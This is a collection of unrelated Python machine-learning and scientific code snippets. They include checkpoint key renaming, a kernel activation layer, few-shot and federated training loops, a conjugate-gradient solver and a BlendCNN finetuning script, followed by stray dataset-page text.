    log.info('aggregated %s dataframes', len(dataframes))
    return dataframes
def convert_beit(ckpt):
    """Rename official BEiT checkpoint keys to the mmseg naming scheme.

    blocks.* -> layers.* with norm->ln, mlp.fc1->ffn.layers.0.0,
    mlp.fc2->ffn.layers.1; patch_embed.proj -> patch_embed.projection;
    all other keys pass through unchanged. Insertion order is preserved.
    """
    remapped = OrderedDict()
    for key, value in ckpt.items():
        if key.startswith('blocks'):
            out_key = key.replace('blocks', 'layers')
            if 'norm' in out_key:
                out_key = out_key.replace('norm', 'ln')
            elif 'mlp.fc1' in out_key:
                out_key = out_key.replace('mlp.fc1', 'ffn.layers.0.0')
            elif 'mlp.fc2' in out_key:
                out_key = out_key.replace('mlp.fc2', 'ffn.layers.1')
        elif key.startswith('patch_embed'):
            out_key = key.replace('patch_embed.proj', 'patch_embed.projection')
        else:
            out_key = key
        remapped[out_key] = value
    return remapped
class DepthEstimatorOutput(ModelOutput):
    """Output container for depth-estimation models.

    NOTE(review): presumably decorated with ``@dataclass`` at the definition
    site (transformers ModelOutput subclasses are dataclasses) — confirm the
    decorator is present.
    """
    # Depth-estimation loss (only when labels were provided).
    loss: Optional[torch.FloatTensor] = None
    # Predicted depth map for each example.
    predicted_depth: torch.FloatTensor = None
    # Hidden states of all layers, when requested.
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    # Attention weights of all layers, when requested.
    attentions: Optional[Tuple[torch.FloatTensor]] = None
def linelistPath(linelist, dr=None):
    """Absolute path of a linelist file in the APOGEE spectro-redux tree.

    ``dr`` selects the data release; None means the 'current' release.
    """
    release = 'current' if dr is None else dr
    base = apogeeSpectroReduxDirPath(dr=release)
    return os.path.join(base, 'speclib', 'linelists', linelist)
class KAF(Layer):
    """Kernel Activation Function layer (Keras/TF1 style).

    Each unit's activation is a kernel expansion over a fixed dictionary of D
    points in [-boundary, boundary], with trainable mixing coefficients
    ``alpha``. Optionally ``init_fcn`` initializes alpha by kernel ridge
    regression so the activation approximates a given function.

    NOTE(review): uses TF1 ``tf.assign`` inside ``build``; the returned assign
    ops are presumably executed by the surrounding session machinery — confirm
    under eager/TF2 execution.
    """
    def __init__(self, num_parameters, D=20, boundary=3.0, conv=False, init_fcn=None, kernel='gaussian', **kwargs):
        self.num_parameters = num_parameters
        self.D = D
        self.boundary = boundary
        self.init_fcn = init_fcn
        self.conv = conv
        # Dense inputs are (batch, units); conv inputs are (batch, H, W, C) —
        # the kernel expansion adds one trailing axis in either case.
        if self.conv:
            self.unsqueeze_dim = 4
        else:
            self.unsqueeze_dim = 2
        self.kernel = kernel
        if (not (kernel in ['gaussian', 'relu', 'softplus'])):
            raise ValueError('Kernel not recognized (must be {gaussian, relu, softplus})')
        super().__init__(**kwargs)
    def build(self, input_shape):
        # Fixed dictionary: D equally spaced points in [-boundary, boundary].
        d = np.linspace((- self.boundary), self.boundary, self.D).astype(np.float32).reshape((- 1), 1)
        if self.conv:
            self.dict = self.add_weight(name='dict', shape=(1, 1, 1, 1, self.D), initializer='uniform', trainable=False)
            tf.assign(self.dict, d.reshape(1, 1, 1, 1, (- 1)))
        else:
            self.dict = self.add_weight(name='dict', shape=(1, 1, self.D), initializer='uniform', trainable=False)
            tf.assign(self.dict, d.reshape(1, 1, (- 1)))
        if (self.kernel == 'gaussian'):
            self.kernel_fcn = self.gaussian_kernel
            # Rule-of-thumb bandwidth: sigma = 2 * dictionary spacing.
            interval = (d[1] - d[0])
            sigma = (2 * interval)
            self.gamma = (0.5 / np.square(sigma))
        elif (self.kernel == 'softplus'):
            self.kernel_fcn = self.softplus_kernel
        else:
            self.kernel_fcn = self.relu_kernel
        # Trainable mixing coefficients, one set per unit/channel.
        if self.conv:
            self.alpha = self.add_weight(name='alpha', shape=(1, 1, 1, self.num_parameters, self.D), initializer='normal', trainable=True)
        else:
            self.alpha = self.add_weight(name='alpha', shape=(1, self.num_parameters, self.D), initializer='normal', trainable=True)
        if (self.init_fcn is not None):
            # Kernel ridge regression on the dictionary to match init_fcn.
            if (self.kernel == 'gaussian'):
                kernel_matrix = np.exp(((- self.gamma) * ((d - d.T) ** 2)))
            elif (self.kernel == 'softplus'):
                kernel_matrix = np.log((np.exp((d - d.T)) + 1.0))
            else:
                raise ValueError('Cannot perform kernel ridge regression with ReLU kernel (singular matrix)')
            alpha_init = np.linalg.solve((kernel_matrix + (1e-05 * np.eye(self.D))), self.init_fcn(d)).reshape((- 1))
            if self.conv:
                tf.assign(self.alpha, np.repeat(alpha_init.reshape(1, 1, 1, 1, (- 1)), self.num_parameters, axis=3))
            else:
                tf.assign(self.alpha, np.repeat(alpha_init.reshape(1, 1, (- 1)), self.num_parameters, axis=1))
        super(KAF, self).build(input_shape)
    def gaussian_kernel(self, x):
        # exp(-gamma * (x - d)^2), broadcast over the dictionary axis.
        return tf.exp(((- self.gamma) * ((tf.expand_dims(x, axis=self.unsqueeze_dim) - self.dict) ** 2.0)))
    def softplus_kernel(self, x):
        return tf.softplus((tf.expand_dims(x, axis=self.unsqueeze_dim) - self.dict))
    def relu_kernel(self, x):
        return tf.relu((tf.expand_dims(x, axis=self.unsqueeze_dim) - self.dict))
    def call(self, x):
        # Weighted sum of kernel responses over the dictionary axis.
        kernel_matrix = self.kernel_fcn(x)
        return tf.reduce_sum((kernel_matrix * self.alpha), axis=self.unsqueeze_dim)
def rotate_and_shift_coordination(orig_x, orig_y, orig_d, coordi_shift_x, coordi_shift_y, coordi_rotate_d):
    """Rotate a pose (x, y, heading) into a rotated frame, then translate it.

    Returns the transformed (x, y, heading).
    """
    rot_x, rot_y, transformed_d = rotate_coordination(orig_x, orig_y, orig_d, coordi_rotate_d)
    transformed_x, transformed_y = shift_coordination(rot_x, rot_y, coordi_shift_x, coordi_shift_y)
    return (transformed_x, transformed_y, transformed_d)
def train_one(task, model, opt, args, grad):
    """Run one few-shot training episode (support/query) and step the optimizer.

    Fixes:
    - The NaN check now runs BEFORE ``backward()``, so a NaN loss no longer
      pollutes the accumulated gradients before bailing out.
    - ``torch.isnan(loss)`` was previously evaluated even when ``loss`` was
      None (a crash); a None loss now skips the step cleanly.
    """
    model['ebd'].train()
    model['clf'].train()
    opt.zero_grad()
    (support, query) = task
    # Embed support and query sets, then classify query given support.
    XS = model['ebd'](support)
    YS = support['label']
    XQ = model['ebd'](query)
    YQ = query['label']
    (_, loss) = model['clf'](XS, YS, XQ, YQ)
    if loss is None:
        return
    if torch.isnan(loss):
        # Skip the whole step on a NaN loss instead of backpropagating it.
        return
    loss.backward()
    if (args.clip_grad is not None):
        nn.utils.clip_grad_value_(grad_param(model, ['ebd', 'clf']), args.clip_grad)
    # Record gradient norms for monitoring.
    grad['clf'].append(get_norm(model['clf']))
    grad['ebd'].append(get_norm(model['ebd']))
    opt.step()
def fed_test(fed, running_model, val_loaders, verbose, adversary=None):
    """Evaluate every client's validation set on the federated model.

    ``adversary`` switches the logging tag between standard ('s') and
    robust ('r') accuracy. Returns (per-client accuracies, mean loss).
    """
    tag = 's' if adversary is None else 'r'
    val_acc_list = [None] * fed.client_num
    val_loss_mt = AverageMeter()
    for client_idx in range(fed.client_num):
        # Load this client's personalized weights into the running model.
        fed.download(running_model, client_idx)
        val_loss, val_acc = test(running_model, val_loaders[client_idx], loss_fun, device, adversary=adversary)
        val_loss_mt.append(val_loss)
        val_acc_list[client_idx] = val_acc
        if verbose > 0:
            print(' {:<19s} Val {:s}Loss: {:.4f} | Val {:s}Acc: {:.4f}'.format('User-' + fed.clients[client_idx], tag.upper(), val_loss, tag.upper(), val_acc))
        wandb.log({f'{fed.clients[client_idx]} val_{tag}-acc': val_acc}, commit=False)
    return (val_acc_list, val_loss_mt.avg)
def prepare_query_box(boxes_list, q, scene):
    """Attach referred-object boxes to a question.

    For every annotated span of the question, the span's last word is tagged
    with BOXES_PLACEHOLDER and the referenced objects' boxes are registered
    (deduplicated) in *boxes_list*.

    Returns (boxes_list, tagged sentence, list of box-index lists per span).
    """
    def index_of_box(box):
        # Reuse an existing entry or append a new one.
        if box in boxes_list:
            return boxes_list.index(box)
        boxes_list.append(box)
        return len(boxes_list) - 1

    def boxes_for_rids(rids):
        indices = []
        for rid in rids:
            obj = scene['objects'][rid]
            # xywh -> xyxy
            xyxy = [obj['x'], obj['y'], obj['x'] + obj['w'], obj['y'] + obj['h']]
            indices.append(index_of_box(xyxy))
        return indices

    words = list(q['question'].split())
    query_boxes_seq = []
    for span_str, rids_str in q['annotations']['question'].items():
        span = tuple(map(int, span_str.split(':')))
        if len(span) == 1:
            # A single position means a one-word span.
            span = [span[0], span[0] + 1]
        # Tag the last word of the span with the placeholder marker.
        words[span[1] - 1] = f'{words[span[1] - 1]}{BOXES_PLACEHOLDER}'
        query_boxes_seq.append(boxes_for_rids(rids_str.split(',')))
    sent_converted = ' '.join(words).strip()
    return (boxes_list, sent_converted, query_boxes_seq)
def standard_pole_step():
    """Perform one pole-radius-guided step of the standard double precision
    Pade continuation in PHCpack; presumably returns the C routine's status
    code — confirm against the phcpy documentation."""
    from phcpy.phcpy2c3 import py2c_padcon_standard_pole_step
    return py2c_padcon_standard_pole_step()
def cg(Ax, b, cg_iters=100):
    """Solve A x = b by conjugate gradients, given only the matvec ``Ax``.

    Stops after ``cg_iters`` iterations or when the search direction's norm
    drops below EPS. ``b`` is not modified.
    """
    x = np.zeros_like(b)
    residual = b.copy()
    direction = residual.copy()
    rr = np.dot(residual, residual)
    for _ in range(cg_iters):
        z = Ax(direction)
        # Step length along the current conjugate direction.
        step = rr / (np.dot(direction, z) + EPS)
        x += step * direction
        residual -= step * z
        rr_next = np.dot(residual, residual)
        # New direction: residual plus a correction to keep conjugacy.
        direction = residual + (rr_next / rr) * direction
        rr = rr_next
        if np.linalg.norm(direction) < EPS:
            break
    return x
class UCM(ImageFolder):
    """UC Merced land-use dataset, loaded as a torchvision ImageFolder rooted
    at ``<root>/Images``."""

    def __init__(self, root: str='.data/UCMerced_LandUse', transform: T.Compose=T.Compose([T.ToTensor()])):
        images_root = os.path.join(root, 'Images')
        super().__init__(root=images_root, transform=transform)
def BasicTransposeConv2d(in_channels, out_channels, kernel_size, stride, pad, dilation):
    """ConvTranspose2d (no bias) + BatchNorm + LeakyReLU(0.2).

    ``output_padding`` is chosen so the transpose exactly inverts the spatial
    size of a matching strided convolution.

    Fix: the original passed ``dilation`` positionally into ConvTranspose2d's
    ``groups`` slot (the positional order is ..., output_padding, groups,
    bias, dilation), so any dilation != 1 silently configured grouped
    convolution with dilation 1. Both are now passed by keyword.
    """
    output_pad = stride + 2 * pad - kernel_size * dilation + dilation - 1
    return nn.Sequential(
        nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride, pad,
                           output_padding=output_pad, groups=1, bias=False,
                           dilation=dilation),
        nn.BatchNorm2d(out_channels),
        nn.LeakyReLU(inplace=True, negative_slope=0.2),
    )
def main(config='config/finetune/agnews/train.json'):
    """Finetune or evaluate a BlendCNN classifier per the given JSON config.

    Loads the top-level config plus the data/model/optimizer sub-configs it
    references, builds the tokenized dataset pipeline and model, then either
    trains (mode 'train') or evaluates accuracy (mode 'eval').
    """
    cfg = Config(**json.load(open(config, 'r')))
    cfg_data = data.Config(**json.load(open(cfg.cfg_data, 'r')))
    cfg_model = models.Config(**json.load(open(cfg.cfg_model, 'r')))
    cfg_optim = trainer.Config(**json.load(open(cfg.cfg_optim, 'r')))
    set_seeds(cfg.seed)
    TaskDataset = data.get_class(cfg_data.task)
    tokenizer = tokenization.FullTokenizer(vocab_file=cfg_data.vocab_file, do_lower_case=True)
    # Pipeline: strip symbols -> tokenize -> add [CLS]/[SEP] + truncate -> ids.
    dataset = TaskDataset(cfg_data.data_file[cfg.mode], pipelines=[data.RemoveSymbols('\\'), data.Tokenizing(tokenizer.convert_to_unicode, tokenizer.tokenize), data.AddSpecialTokensWithTruncation(cfg_data.max_len), data.TokenIndexing(tokenizer.convert_tokens_to_ids, TaskDataset.labels, cfg_data.max_len)], n_data=None)
    dataset = TensorDataset(*dataset.get_tensors())
    data_iter = DataLoader(dataset, batch_size=cfg_optim.batch_size, shuffle=True)
    model = models.BlendCNN(cfg_model, len(TaskDataset.labels))
    # Only the embedding layer is initialized from the pretrained checkpoint.
    checkpoint.load_embedding(model.embed, cfg.pretrain_file)
    optimizer = optim.optim4GPU(cfg_optim, model)
    train_loop = trainer.TrainLoop(cfg_optim, model, data_iter, optimizer, cfg.save_dir, get_device())
    def get_loss(model, batch, global_step):
        """Cross-entropy loss for one batch (global_step unused)."""
        (input_ids, segment_ids, input_mask, label_id) = batch
        logits = model(input_ids, segment_ids, input_mask)
        loss = nn.CrossEntropyLoss()(logits, label_id)
        return loss
    def evaluate(model, batch):
        """Return (batch accuracy, per-example correctness) for one batch."""
        (input_ids, segment_ids, input_mask, label_id) = batch
        logits = model(input_ids, segment_ids, input_mask)
        (_, label_pred) = logits.max(1)
        result = (label_pred == label_id).float()
        accuracy = result.mean()
        return (accuracy, result)
    if (cfg.mode == 'train'):
        train_loop.train(get_loss, cfg.model_file, None)
        print('Training has been done properly.')
    elif (cfg.mode == 'eval'):
        results = train_loop.eval(evaluate, cfg.model_file)
        total_accuracy = torch.cat(results).mean().item()
        print(f'Accuracy: {total_accuracy}')
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.